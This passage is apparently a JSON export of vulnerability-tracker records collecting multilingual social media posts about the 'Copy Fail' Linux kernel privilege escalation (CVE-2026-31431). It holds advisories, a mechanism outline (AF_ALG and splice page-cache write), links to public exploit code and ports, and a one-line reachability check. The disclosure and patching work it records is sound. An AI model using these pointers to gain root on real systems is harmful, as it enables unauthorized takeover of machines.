"https://bsky.app/profile/alice-bot-yay.bsky.social/post/3mko3ezrmcs27", "content": "a 732-byte exploit that silently rooted every linux distro since 2017. one logic bug chained through three kernel mechanisms into a 4-byte page-cache write. no race, no offsets \u2014 just a straight line through the architecture. cve-2026-31431", "creation_timestamp": "2026-04-29T21:50:28.451461Z"}, {"uuid": "9af1a511-6597-4b41-8473-25197d3ee093", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko4f4smak24", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T22:08:37.698363Z"}, {"uuid": "2796648a-26cd-49d1-b145-6407bf23a5e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/aprosdoketon.bsky.social/post/3mkozudv6u226", "content": "CVE-2026-31431 \u043f\u0456\u0434\u0432\u0438\u0449\u0435\u043d\u043d\u044f \u043f\u0440\u0438\u0432\u0456\u043b\u0435\u0457\u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0443 \u043b\u0456\u043d\u0443\u043a\u0441\u0456, \u0437 2017-\u0433\u043e \u0440\u043e\u043a\u0443 \u0434\u043e \u0441\u044c\u043e\u0433\u043e\u0434\u043d\u0456", "creation_timestamp": "2026-04-30T06:55:54.503883Z"}, {"uuid": "b0321749-00f3-4acb-b229-68fcaebcf822", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko4f5zcjk24", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T22:08:38.219837Z"}, {"uuid": "f408f387-966a-4bda-929d-8c99ce1932c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jianmin.defcon.social.ap.brid.gy/post/3mkpvvr6mcyv2", "content": "python3 -c 'import socket; s=socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0); s.bind((\"aead\",\"authencesn(hmac(sha256),cbc(aes))\")); print(\"REACHABLE\")' 2>&1\n\nIf you see: \"file not found\" then you're probably not vulnerable to copy.fail (#CVE-2026-31431 #copyfail)\n\nIf you see \"REACHABLE,\" [\u2026]", "creation_timestamp": "2026-04-30T15:17:57.982071Z"}, {"uuid": "83440f92-3052-4187-84f6-66780736a681", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/what.tf/post/3mko4f5zcjl24", "content": "\ud83d\udea8 CVE-2026-31431 (Copy Fail)\nGo patch all your Linux distros ASAP.\n\nTL; DR: Easy and portable Linux privilege escalation, a local user is able to become root with very little prerequisites. All major distros affected.\ncopy.fail\nxint.io/blog/copy-fa...\nsecurity-tracker.debian.org/tracker/CVE-...", "creation_timestamp": "2026-04-29T22:08:38.748811Z"}, {"uuid": "ebd55174-6e19-429a-98ec-0175b3f6096c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tokifu.jp/post/3mko66w3ifk2t", "content": "Copy Fail aka CVE-2026-31431\u3001\u307e\u3060Omarchy\u3067\u306fKernel\u304c\u964d\u3063\u3066\u3053\u306a\u3044\u307f\u305f\u3044\u3060\u306a\u3002Arch Linux\u5074\u3082\u300c4\u6708\u4e2d\u306eKernel update\u3067\u4fee\u6b63\u3055\u308c\u308b\u4e88\u5b9a\u300d\u3068\u3055\u308c\u3066\u3044\u308b\u304c\u3001\u307e\u3060\u3060\u3063\u305f\u307f\u305f\u3044\u3060\u306a\ud83d\udc40", "creation_timestamp": "2026-04-29T22:40:45.133186Z"}, {"uuid": "f76c4d68-3ebc-4595-940c-5011c14a96ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/obivan/statuses/116490412218240083", "content": "CVE-2026-31431 is a Linux LPE, PoC script roots every distrubution shipped since 2017 https://copy.fail/", "creation_timestamp": "2026-04-29T22:43:51.026882Z"}, {"uuid": "e4ed8f56-5a49-4633-ac36-c2466ca8a03a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blackhatnews.tokyo/post/3mkpvzmhj332v", "content": "CVE-2026-31431: \u300cCopy Fail\u300dLinux \u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u306b\u3088\u308a\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u6570\u79d2\u3067 root\u00a0\u6a29\u9650\u3092\u53d6\u5f97\u53ef\u80fd\n\n\u8105\u5a01\u7814\u7a76\u30c7\u30a3\u30ec\u30af\u30bf\u30fc2026\u5e744\u670829\u65e5\u3001Linux \u30ab\u30fc\u30cd\u30eb\u306e algif_aead \u30e6\u30fc\u30b6\u30fc\u30b9\u30da\u30fc\u30b9\u6697\u53f7\u30a4\u30f3\u30bf\u30fc\u30d5\u30a7\u30fc\u30b9\u3067\u3001\u300cCopy Fail\u300d\u3068\u547c\u3070\u308c\u308b CVE-2026-31431\uff08CVSS 7.8 HIGH\uff09\u304c\u958b\u793a\u3055\u308c\u307e\u3057\u305f\u3002Theori \u306e\u7814\u7a76\u8005\u3089\u306f\u3001\u6a29\u9650\u306e\u306a\u3044\u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c setuid \u30d0\u30a4\u30ca\u30ea", "creation_timestamp": "2026-04-30T15:19:56.215430Z"}, {"uuid": "d396c0e7-d547-4666-a23d-279b7819b5a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/kicksecure.com/post/3mkpwmeattb24", "content": "copy.fail / CVE-2026-31431: Linux kernel local privilege escalation.\n\nUpdate kernels when fixes land, then reboot.\n\nHelp wanted: reduce SUID attack surface upstream. If you don\u2019t help, it probably won\u2019t happen.\n\nforums.kicksecure.co...\n", "creation_timestamp": "2026-04-30T15:30:25.815649Z"}, {"uuid": "79c84a3b-d8f5-4773-a2b0-fc05394273b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ineumann.fr/post/3mkpxywbres24", "content": "Elle est m\u00e9ga chaude la CVE-2026-31431, surpris que \u00e7a fasse pas au moins autant de bruit que xzutils ou log4j gitlab.cwcloud.tech/oss/cve-2026... surtout que les patchs sont pas ouf encore", "creation_timestamp": "2026-04-30T15:55:23.597998Z"}, {"uuid": "c17ad11e-90ff-412a-b126-496ab4e1eae6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fschmidt.bsky.social/post/3mkpx3dh6rk2x", "content": "CVE-2026-31431 (Kollegen haben es schon gefixt.)", "creation_timestamp": "2026-04-30T15:38:47.760981Z"}, {"uuid": "7f4b0809-23fc-4fc6-82bb-203d5612c94b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3mkpxh6nhik2q", "content": "The \u201cCopy Fail\u201d flaw (CVE-2026-31431) allows local attackers to gain root access on Linux kernels since 2017 via a controlled 4-byte write to page cache using AF_ALG and splice. #LinuxKernel #LocalExploit #USA", "creation_timestamp": "2026-04-30T15:45:25.883286Z"}, {"uuid": "66d8f06f-0c71-4c73-8f66-ef8f645a4ec7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/samuelvermeulenpro.bsky.social/post/3mkpxhueple2z", "content": "#ActuLibre - Copy Fail (CVE-2026-31431) : d\u00e9tecter, corriger, comprendre \u00e0 lire sur\nhttps://loud-technology.com/insight/copy-fail-cve-2026-31431-faille-kernel-linux/", "creation_timestamp": "2026-04-30T15:45:48.344187Z"}, {"uuid": "672dd42a-b655-4303-ac37-551c7ce6c40f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mkpxq37ox2j2", "content": "CVE-2026-31431: \u201cCopy Fail\u201d Linux kernel flaw lets local users gain root in seconds\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T15:50:27.053718Z"}, {"uuid": "7d12b601-d455-4dfa-a51c-d77423715cdf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/bellmore.bsky.social/post/3mkpyftxtk22v", "content": "Nerd friends:\n\nYesterday, CVE-2026-31431 (\"Copy Fail\") was publicly disclosed. This exploit allows an unprivileged shell user on a Linux system to gain root access with a simple 10-line Python script. The mechanisms for the exploit can be found at copy.fail.\n\nPlease patch your systems ASAP!\n#Infosec", "creation_timestamp": "2026-04-30T16:02:34.151393Z"}, {"uuid": "d84f14f2-85a0-438b-a814-c6309bda6827", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkpyn2ctmpy2", "content": "Copy Fail (CVE-2026-31431): Frequently asked questions about Linux kernel privilege escalation vulnerability A flaw in the Linux kernel present since 2017 allows a local user to gain root access on...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T16:06:38.980933Z"}, {"uuid": "1a784a25-e75a-4a64-b9a2-a02b6b03b35d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/lampsofgold.veoh.social.ap.brid.gy/post/3mkpz6kljg572", "content": "@mntmn looks like there\u2019s an aarch64 port https://github.com/theori-io/copy-fail-CVE-2026-31431/pull/25", "creation_timestamp": "2026-04-30T16:16:24.346711Z"}, {"uuid": "fccde9ef-75ba-4b57-9e30-48b7c1e63c97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkpzr5h2th25", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T16:26:47.142428Z"}, {"uuid": "4146553c-1f2e-4f9c-a30e-e7996c165353", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkpzxujny62s", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T16:30:32.598522Z"}, {"uuid": "62994e63-2259-4908-8f71-f813c137814e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/isAutonomous.karlsruhe-social.de.ap.brid.gy/post/3mkp2l43g5q72", "content": "@giggls Verdammt, ja. Das ist die richtige ID:\nhttps://euvd.enisa.europa.eu/vulnerability/CVE-2026-31431\n\nDie Bezeichnungen bei den Europ\u00e4ern sind irritierend. Warum m\u00fcssen die eigene Nummern vergeben?\n\"EUVD-2026-24639\"", "creation_timestamp": "2026-04-30T07:08:39.517074Z"}, {"uuid": "4059e598-c5a2-4374-a893-6e1a8cfb17b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkq27k433p2v", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-04-30T16:34:50.009044Z"}, {"uuid": "84758647-e254-471d-804e-c4473e751fc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/canartuc.com/post/3mkq2arf6e72p", "content": "Xint Code disclosed CopyFail (CVE-2026-31431) Wednesday. Logic bug in the kernel crypto socket layer from a 2017 commit. Nine years on every major distro. Fuzzing missed it. Static analysis missed it. AI-assisted review caught it. Rust would not have, this is logic.\n\n#Linux #InfoSec #OpenSource", "creation_timestamp": "2026-04-30T16:35:31.330211Z"}, {"uuid": "d82099a4-83ae-4417-8cdf-1a3fda3addb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mkp2kqi6ts2y", "content": "Au boulot, exploit impossible, l'EDR g\u00e8re le truc.\nOUF ! \n\nsuccessfully killed the threat copy_fail_exp.py on Thu, 30 Apr 2026, 06:40:56 UTC.\nThreat path: /home/test/copy-fail-CVE-2026-31431/copy_fail_exp.py", "creation_timestamp": "2026-04-30T07:08:57.627559Z"}, {"uuid": "7475ed26-25f9-43d5-968b-4c4860c88e91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/iwate.me/post/3mkq2k2afdn2p", "content": "[AUTO] I read this.\n\nLinux\u30ab\u30fc\u30cd\u30eb\u306e\u8106\u5f31\u6027\u300cCopyFail (CVE-2026-31431)\u300d\u3092EC2\u306eUbuntu 22.04\u3067\u5b9f\u8a3c\u3057\u3066\u307f\u305f\nhttps://zenn.dev/aeyesec/articles/7e4a1e3c83e81b", "creation_timestamp": "2026-04-30T16:40:42.461637Z"}, {"uuid": "5f370959-431e-4dee-9a86-55ac07b0beb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkp35z5p4l2l", "content": "\u300cCopy Fail\u300dCVE-2026-31431 \u2014 9\u5e74\u9593\u6f5c\u3093\u3067\u3044\u305f732\u30d0\u30a4\u30c8Python\u3067Linux\u304croot\u5316\u3055\u308c\u308b\u8106\u5f31\u6027\u3068\u5bfe\u7b56\uff5czephel01\nhttps://note.com/zephel01/n/n7fa6564b43cf", "creation_timestamp": "2026-04-30T07:19:13.256066Z"}, {"uuid": "353fc869-1d82-4617-b7c6-74e547a39c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/obivan.infosec.exchange.ap.brid.gy/post/3mko6eh6th3k2", "content": "CVE-2026-31431 is a Linux LPE, PoC script roots every distrubution shipped since 2017 https://copy.fail/", "creation_timestamp": "2026-04-29T22:43:53.685330Z"}, {"uuid": "fec06bab-ebfb-424b-b17b-f8dd5f188833", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/badsectorlabs.com/post/3mko7e2uivk2c", "content": "CopyFail (CVE-2026-31431) in Go. In case you want to get root from a static binary without Python as a dependency.\n\ngithub.com/badsectorlab...", "creation_timestamp": "2026-04-29T23:01:32.409502Z"}, {"uuid": "bc1da2f3-28be-4638-ba0a-a550cf365b4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/egghat.bsky.social/post/3mkq2way7zv2t", "content": "Oops.\n\n\u201eIf your kernel was built between 2017 and the patch \u2014 which covers essentially every mainstream Linux distribution \u2014 you're in scope.\u201c\n\nCopy Fail \u2014 CVE-2026-31431 copy.fail\n#BadNews", "creation_timestamp": "2026-04-30T16:47:32.774775Z"}, {"uuid": "15f6402a-90e7-4620-b388-472d86851c50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/captechgroup.com/post/3mkq2waszmp2n", "content": "CVE-2026-31431 gives any local user reliable root access on Linux systems deployed since 2017, with no race conditions needed and no forensic traces left behind. #infosec #cybersecurity", "creation_timestamp": "2026-04-30T16:47:33.314794Z"}, {"uuid": "55cf6e44-b903-4189-9e83-0541ccabe7c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/codeenigma.toots.codeenigma.com.ap.brid.gy/post/3mkq2ryjeosl2", "content": "In case anyone is wondering about exposure to #CopyFail, CVE-2026-31431, well we're exposed of course, like everyone. Currently waiting for a #Debian patch to drop. unattended-upgrades will take care of applying it and we will take care of reboots as required.\n\nFORTUNATELY, in almost every case [\u2026]", "creation_timestamp": "2026-04-30T16:47:42.867419Z"}, {"uuid": "a38e5f7d-69b4-4a92-828a-f5128536666a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/codeenigma.toots.codeenigma.com.ap.brid.gy/post/3mkq2ua423fv2", "content": "Related links:\n\nhttps://copy.fail/\nhttps://security-tracker.debian.org/tracker/CVE-2026-31431", "creation_timestamp": "2026-04-30T16:49:20.896241Z"}, {"uuid": "b127a3d5-bfde-45ed-a157-12b8da120133", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/AAKL/statuses/116494699869475729", "content": "New.\n\"Hello! Yes, it's all a disaster again!\"\nWatch Tower: The Internet Is Falling Down, Falling Down, Falling Down (cPanel & WHM Authentication Bypass CVE-2026-41940) https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/ #threatresearch \nAlso:\nTenable: Copy Fail (CVE-2026-31431): Frequently asked questions about Linux kernel privilege escalation vulnerability https://www.tenable.com/blog/copy-fail-cve-2026-31431-frequently-asked-questions-about-linux-kernel-privilege-escalation @tenable #Linux #infosec #vulnerability", "creation_timestamp": "2026-04-30T16:54:12.966621Z"}, {"uuid": "a38f084c-b0e8-4af8-9434-15baed1c10bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/cert_eu/statuses/116492956743147474", "content": "High Vulnerability in the Linux Kernel (\"Copy Fail\") (CERT-EU Security Advisory 2026-005)\nOn 29 April 2026, a high local privilege escalation vulnerability in the Linux kernel, tracked as CVE-2026-31431 and named \"Copy Fail\", was publicly disclosed.\nThe vulnerability affects every mainstream Linux distributions shipping a kernel built since 2017. A public proof-of-concept exploit has been released.As of the date of this advisory, no distribution has shipped a fixed kernel package. The mainline fix was committed on 1 April 2026, but vendor updates are still pending across all major distributions. \nCERT-EU strongly recommends applying the interim mitigation immediately, prioritising Kubernetes nodes, and CI/CD runners exposed to untrusted workloads.\nhttps://www.cert.europa.eu/publications/security-advisories/2026-005/", "creation_timestamp": "2026-04-30T09:30:55.246235Z"}, {"uuid": "256a183d-3053-4c12-9052-bfb3a9dadd2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/securityrss.bsky.social/post/3mkpcnuzk3e2q", "content": "A local privilege escalation vulnerability in the Linux kernel, dubbed Copy Fail (CVE-2026-31431), allows unprivileged users to gain root access by modifying the page cache of readable files. This flaw affects major Linux distributions, including Debian, Ubuntu, and SUSE, which have issued patches.", "creation_timestamp": "2026-04-30T09:33:22.106362Z"}, {"uuid": "858d1fb3-37e2-47fc-9fb9-a3d9df425934", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3mkpcsszf2me2", "content": "New Linux 'Copy Fail' Vulnerability Enables Root Access on Major Distributions TheHackerNews CVE-2026-31431 CVSS 7.8 flaw since 2017 enables root via 732-byte exploit, impacting major Linux...\n\n#Security #News\n\nOrigin | Interest | Match", "creation_timestamp": "2026-04-30T09:40:22.366285Z"}, {"uuid": "c490b9de-6d61-4eb2-bba2-8d4de14c846e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3mkq44qmae72c", "content": "Critical #LinuxKernel vulnerability 'Copy Fail' (CVE-2026-31431) grants root access across major distributions since 2017. Immediate patching recommended. #CyberSecurity #Linux #Vulnerability Link: thedailytechfeed.com/critical-lin...", "creation_timestamp": "2026-04-30T17:09:05.496194Z"}, {"uuid": "64b969d9-58df-4aa4-9f79-5720d2aafc59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://social.tchncs.de/users/gborn/statuses/116493037293455809", "content": "Wer ein Linux betreibt, auf dem viele Nutzer ein Konto haben, sollte bzgl. der #CopyFail Schwachstelle CVE-2026-31431 reagieren.\nhttps://borncity.com/blog/2026/04/30/linux-schwachstelle-copy-fail-cve-2026-31431-erlaubt-rooting/", "creation_timestamp": "2026-04-30T09:51:24.479831Z"}, {"uuid": "341728e2-48d4-44dd-a5b4-570e3209606a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/etguenni.bsky.social/post/3mkpdojsvj22l", "content": "Wer ein Linux betreibt, auf dem viele Nutzer ein Konto haben, sollte bzgl. der #CopyFail Schwachstelle CVE-2026-31431 reagieren.\n\nborncity.com/blog/2026/04...", "creation_timestamp": "2026-04-30T09:51:42.469127Z"}, {"uuid": "2516ff9a-fd70-476c-bd01-7123cd02d3d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/upsun.com/post/3mkq4pfzvfs25", "content": "We are aware of the recently disclosed copy.fail vulnerability (CVE-2026-31431) and want to assure our customers that Upsun systems are not affected. The module targeted by this vulnerability is disabled in our platform. There is no risk of exploitation, and no action is required on your part. \u2728 1/3", "creation_timestamp": "2026-04-30T17:19:35.238890Z"}, {"uuid": "6d7f3482-874b-4bf0-b89c-096b01a74a4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pbloem.sigmoid.social.ap.brid.gy/post/3mkpdvdrqk7q2", "content": "So, copy.fail was found with one hour of AI assistance, and would (according to this article) have earned $500K on the open market not too long ago.\n\nhttps://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/\n\nI'm no security researcher, but this kind of contradicts all those [\u2026]", "creation_timestamp": "2026-04-30T09:55:34.222493Z"}, {"uuid": "0a714740-d1c8-4ee3-8532-02e788351aea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelsandpulse.bsky.social/post/3mkoa4rz4pa2s", "content": "The 'Copy Fail' (CVE-2026-31431) Linux root exploit is a deterministic LPE that's been in the kernel for years, but some major distros are downplaying its severity. Learn why this page cache overwrite is a critical threat to your\u2026\n\nhttps://www.tpp.blog/1jvud7s\n\n#opensource #cve202631431 #copyfail", "creation_timestamp": "2026-04-29T23:15:21.638149Z"}, {"uuid": "7df0219e-8b41-42c2-ac6f-7cba7769e307", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116493067934486304", "content": "[VULN] \u26a0\ufe0f\"Copy Fail - Une IA trouve la faille Linux que personne n'a vue\"\" * Copy Fail (CVE-2026-31431) est une faille Linux qui permet de passer de simple utilisateur \u00e0 root en 732 octets, affectant la quasi-totalit\u00e9 des kernels non patch\u00e9s depuis 2017, d\u00e9couverte par une IA en une heure.\n\nLa faille exploite une optimisation de 2017 dans le sous-syst\u00e8me crypto qui laisse un fichier en lecture seule accessible en zone modifiable, permettant de modifier progressivement un binaire syst\u00e8me via l'appel splice().\nDeux solutions de protection existent : patcher le kernel via la distro ou d\u00e9sactiver le module algif_aead (ou bloquer le sous-syst\u00e8me crypto via seccomp si le module est int\u00e9gr\u00e9 en dur).\"\ud83d\udc47 https://korben.info/copy-fail-faille-kernel-linux-decouverte-ia.html\nDemo / exploit ( via @bortzmeyer  )\ud83d\udc47 https://www.bortzmeyer.org/copyfail.html\n\ud83d\udd0d \u2b07\ufe0f https://vulnerability.circl.lu/vuln/CVE-2026-31431\n\ud83d\udcac \u2b07\ufe0f https://infosec.pub/post/45735124\n#CyberVeille  #CVE_2026_31431", "creation_timestamp": "2026-04-30T09:59:11.467521Z"}, {"uuid": "117855a9-2d27-49f2-a6a7-2c63aaeed452", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cyberveille-ch.bsky.social/post/3mkpe6c6sob2w", "content": "\ud83d\udce2 CVE-2026-31431 ' Copy Fail ' : escalade de privil\u00e8ges root en 732 octets sur toutes les distributions Linux majeures\n\ud83d\udcdd ## \ud83d\udd0d \u2026\nhttps://cyberveille.ch/posts/2026-04-30-cve-2026-31431-copy-fail-escalade-de-privileges-root-en-732-octets-sur-toutes-les-distributions-linux-majeures/ #AF_ALG #Cyberveille", "creation_timestamp": "2026-04-30T10:00:30.775814Z"}, {"uuid": 